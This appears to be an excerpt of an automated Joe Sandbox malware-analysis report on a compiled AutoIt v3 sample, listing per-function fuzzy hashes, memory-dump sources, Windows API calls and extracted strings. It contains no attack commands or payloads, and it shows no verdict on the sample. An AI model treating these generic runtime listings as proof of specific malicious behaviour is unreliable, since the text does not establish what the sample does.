                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9edaeaab2dba2a303edb019c431b35dbef9a25bf797ef58009905f1e856e7fa6
                                                                        • Instruction ID: 7f5afeb3d850bf5dcee95f27ba1ece569bef1ddece3879e911c808d0c7f0e55e
                                                                        • Opcode Fuzzy Hash: 9edaeaab2dba2a303edb019c431b35dbef9a25bf797ef58009905f1e856e7fa6
                                                                        • Instruction Fuzzy Hash: 0A127C70A006099FDF14DFA5D981AEEB7F9FF48304F10A629E40AF7251EB35A911CB54
                                                                        Function 00E7AF50 Relevance: .5, Instructions: 514COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Exception@8Throwstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 3728558374-0
                                                                        • Opcode ID: 7be34294771a716c7794c5e9b1ba9904da39231a66dabe7395b97b1728b0e463
                                                                        • Instruction ID: 67e8f555804be28d0329b37850453bfd1a568f284711c3dccdea4d4fc4340270
                                                                        • Opcode Fuzzy Hash: 7be34294771a716c7794c5e9b1ba9904da39231a66dabe7395b97b1728b0e463
                                                                        • Instruction Fuzzy Hash: 64029070A00209DBCF14DF65D991AAEBBF9EF48300F14D469E90AFB255EB31DA11CB91
                                                                        Function 00E902A4 Relevance: .3, Instructions: 345COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                        • Instruction ID: d87b31e5f349021fa7bbbd3d2bb2933c905fb93c57d4035e1a95960b556db5bd
                                                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                        • Instruction Fuzzy Hash: 64C1D5722051930EDF2D863A847443EFBA15EA2BB931A276DD8B7DB4D1EF24C524D720
                                                                        Function 00E906D9 Relevance: .3, Instructions: 341COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                        • Instruction ID: ac7003d970febdf2bebc75015de195f4be911bf623300498d34cd36c78cec1d0
                                                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                        • Instruction Fuzzy Hash: 97C1F3732051930EDF2D463AC47443EBAA15EA2BB930A276DD4B7EB0D5EF24C524D720
                                                                        Function 00E8FE6F Relevance: .3, Instructions: 331COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                        • Instruction ID: 7c53e7d84620efacc99831b3eeec94a9b2dec7ebed615360bb6e8e29e747c91d
                                                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                        • Instruction Fuzzy Hash: 30C1E5722051930EDF2D463AC47443EFAA15AA27B931A277DD4BBEB4E1EF24C524D720
                                                                        Function 00E8FA57 Relevance: .3, Instructions: 323COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                        • Instruction ID: 084b987ee5b408b2f7abf7dda5ee82c5b3d45dbf8f6fe79325ded2c26f5a32a0
                                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                        • Instruction Fuzzy Hash: F6C1E2722090930ADF2D5639C47043EFAA15AA2BB931A277DD4BFEB4D5EF24C524D720
                                                                        Function 017CFA00 Relevance: .1, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673809921.00000000017CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_17cc000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                        • Instruction ID: 9b783af5a0fa929eb30b3a0d8f72d3eabc9e5f9e55c7a58cf9a348b8bbd9bc70
                                                                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                        • Instruction Fuzzy Hash: 4341C271D1051CEBCF48CFADC991AAEFBF2AF88201F548299D516AB345D730AB41DB40
                                                                        Function 017CF8F0 Relevance: .0, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673809921.00000000017CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_17cc000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                        • Instruction ID: 358a6ab1ecee919570902a24e2e394d2e4bbec1b80761394f00d61c10594e38b
                                                                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                        • Instruction Fuzzy Hash: 95019279A00109EFCB44DF98C5909AEF7B6FB48710F60859DD809E7305D730AE42DB80
                                                                        Function 017CF890 Relevance: .0, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673809921.00000000017CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_17cc000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                        • Instruction ID: 433d707ee97ed5dcd5aef8d6e33f06162ef326eff12e7a777997401370f9fcb9
                                                                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                        • Instruction Fuzzy Hash: 4C018078A00109EFCB48DF98C5909AEF7F6FF48710B60859DD809A7305D730AE41DB80
                                                                        Function 017CE270 Relevance: .0, Instructions: 6COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673809921.00000000017CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_17cc000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                        Function 00ECA2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DeleteObject.GDI32(00000000), ref: 00ECA2FE
                                                                        • DeleteObject.GDI32(00000000), ref: 00ECA310
                                                                        • DestroyWindow.USER32 ref: 00ECA31E
                                                                        • GetDesktopWindow.USER32 ref: 00ECA338
                                                                        • GetWindowRect.USER32(00000000), ref: 00ECA33F
                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00ECA480
                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00ECA490
                                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ECA4D8
                                                                        • GetClientRect.USER32(00000000,?), ref: 00ECA4E4
                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00ECA51E
                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ECA540
                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ECA553
                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ECA55E
                                                                        • GlobalLock.KERNEL32(00000000), ref: 00ECA567
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ECA576
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00ECA57F
                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ECA586
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00ECA591
                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ECA5A3
                                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00EFD9BC,00000000), ref: 00ECA5B9
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00ECA5C9
                                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00ECA5EF
                                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00ECA60E
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ECA630
                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00ECA81D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                        • API String ID: 2211948467-2373415609
                                                                        • Opcode ID: 2b6ceefd50908c944a1cf43d8d8d80433c9c23715153717b2d9db6b70bbe8649
                                                                        • Instruction ID: ceb6d5075da4c74832846d028d58321bec4e518d962609fa7db7ea2e4cf213f0
                                                                        • Opcode Fuzzy Hash: 2b6ceefd50908c944a1cf43d8d8d80433c9c23715153717b2d9db6b70bbe8649
                                                                        • Instruction Fuzzy Hash: 85026C71900258EFDB14DFA9CD89EAE7BBAFF48314F048158F915AB2A1C7719D42CB60
                                                                        Function 00EDD285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00EDD2DB
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00EDD30C
                                                                        • GetSysColor.USER32(0000000F), ref: 00EDD318
                                                                        • SetBkColor.GDI32(?,000000FF), ref: 00EDD332
                                                                        • SelectObject.GDI32(?,00000000), ref: 00EDD341
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00EDD36C
                                                                        • GetSysColor.USER32(00000010), ref: 00EDD374
                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00EDD37B
                                                                        • FrameRect.USER32(?,?,00000000), ref: 00EDD38A
                                                                        • DeleteObject.GDI32(00000000), ref: 00EDD391
                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00EDD3DC
                                                                        • FillRect.USER32(?,?,00000000), ref: 00EDD40E
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EDD439
                                                                          • Part of subcall function 00EDD575: GetSysColor.USER32(00000012), ref: 00EDD5AE
                                                                          • Part of subcall function 00EDD575: SetTextColor.GDI32(?,?), ref: 00EDD5B2
                                                                          • Part of subcall function 00EDD575: GetSysColorBrush.USER32(0000000F), ref: 00EDD5C8
                                                                          • Part of subcall function 00EDD575: GetSysColor.USER32(0000000F), ref: 00EDD5D3
                                                                          • Part of subcall function 00EDD575: GetSysColor.USER32(00000011), ref: 00EDD5F0
                                                                          • Part of subcall function 00EDD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EDD5FE
                                                                          • Part of subcall function 00EDD575: SelectObject.GDI32(?,00000000), ref: 00EDD60F
                                                                          • Part of subcall function 00EDD575: SetBkColor.GDI32(?,00000000), ref: 00EDD618
                                                                          • Part of subcall function 00EDD575: SelectObject.GDI32(?,?), ref: 00EDD625
                                                                          • Part of subcall function 00EDD575: InflateRect.USER32(?,000000FF,000000FF), ref: 00EDD644
                                                                          • Part of subcall function 00EDD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EDD65B
                                                                          • Part of subcall function 00EDD575: GetWindowLongW.USER32(00000000,000000F0), ref: 00EDD670
                                                                          • Part of subcall function 00EDD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EDD698
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                        • String ID:
                                                                        • API String ID: 3521893082-0
                                                                        • Opcode ID: a54781b8addcfabb1e9fe8521e43ff16db32254550cebd3f0ff7562bb463880d
                                                                        • Instruction ID: 8d5d489c5d4653d041150e83f07635ee1a699c1d9c382585bc73220e8b4c1344
                                                                        • Opcode Fuzzy Hash: a54781b8addcfabb1e9fe8521e43ff16db32254550cebd3f0ff7562bb463880d
                                                                        • Instruction Fuzzy Hash: 47917D7100D305EFC7109F65DC08A6B7BAAFF89325F105A19F962A61A0C771D949CB52
                                                                        Function 00E8B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DestroyWindow.USER32 ref: 00E8B98B
                                                                        • DeleteObject.GDI32(00000000), ref: 00E8B9CD
                                                                        • DeleteObject.GDI32(00000000), ref: 00E8B9D8
                                                                        • DestroyIcon.USER32(00000000), ref: 00E8B9E3
                                                                        • DestroyWindow.USER32(00000000), ref: 00E8B9EE
                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00EED2AA
                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00EED2E3
                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00EED711
                                                                          • Part of subcall function 00E8B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E8B759,?,00000000,?,?,?,?,00E8B72B,00000000,?), ref: 00E8BA58
                                                                        • SendMessageW.USER32 ref: 00EED758
                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00EED76F
                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00EED785
                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00EED790
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                        • String ID: 0
                                                                        • API String ID: 464785882-4108050209
                                                                        • Opcode ID: 994c45229c152c5f480d599157c3736067221e338bff889660b7c59f5f9fab13
                                                                        • Instruction ID: b8395359f7c3c07b640040ff58a60f3ffbe78ddf62bcb18e846ad8bc0c41efbd
                                                                        • Opcode Fuzzy Hash: 994c45229c152c5f480d599157c3736067221e338bff889660b7c59f5f9fab13
                                                                        • Instruction Fuzzy Hash: 5E12AC30108245DFCB21DF26C884BA9BBE5FF89308F146569E999EB262C731EC45CB91
                                                                        Function 00EBDBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00EBDBD6
                                                                        • GetDriveTypeW.KERNEL32(?,00F0DC54,?,\\.\,00F0DC00), ref: 00EBDCC3
                                                                        • SetErrorMode.KERNEL32(00000000,00F0DC54,?,\\.\,00F0DC00), ref: 00EBDE29
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DriveType
                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                        • API String ID: 2907320926-4222207086
                                                                        • Opcode ID: 6c8a0522519f7eeb689994112d52bc6ef86f09ba0140f0a2f12ff7b4290d10ca
                                                                        • Instruction ID: 36560ca5cb3d80fe3fc64256f0cedd75b3c572d457a59fb9463e578742e65162
                                                                        • Opcode Fuzzy Hash: 6c8a0522519f7eeb689994112d52bc6ef86f09ba0140f0a2f12ff7b4290d10ca
                                                                        • Instruction Fuzzy Hash: EC51947024C712AB8610DF10DC818EBB7E1FB94709B207A29F4C7B7295EB64D945EB47
                                                                        Function 00E7CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                        • API String ID: 1038674560-86951937
                                                                        • Opcode ID: 60c3ce7b0435103e14d1240d107efcf80103be0648b6a37b0648d94246da0f0c
                                                                        • Instruction ID: 5e126ed74a17a731ff808ef7d69c81d5d04a77298baf89a4d8f49b5a94ec0031
                                                                        • Opcode Fuzzy Hash: 60c3ce7b0435103e14d1240d107efcf80103be0648b6a37b0648d94246da0f0c
                                                                        • Instruction Fuzzy Hash: 8E81F97064021A6BDB25AEA5DC43FAF77ADAF14304F14A06DFA0D7A1C2EB60D941E291
                                                                        Function 00ED638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?,00F0DC00), ref: 00ED6449
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                        • API String ID: 3964851224-45149045
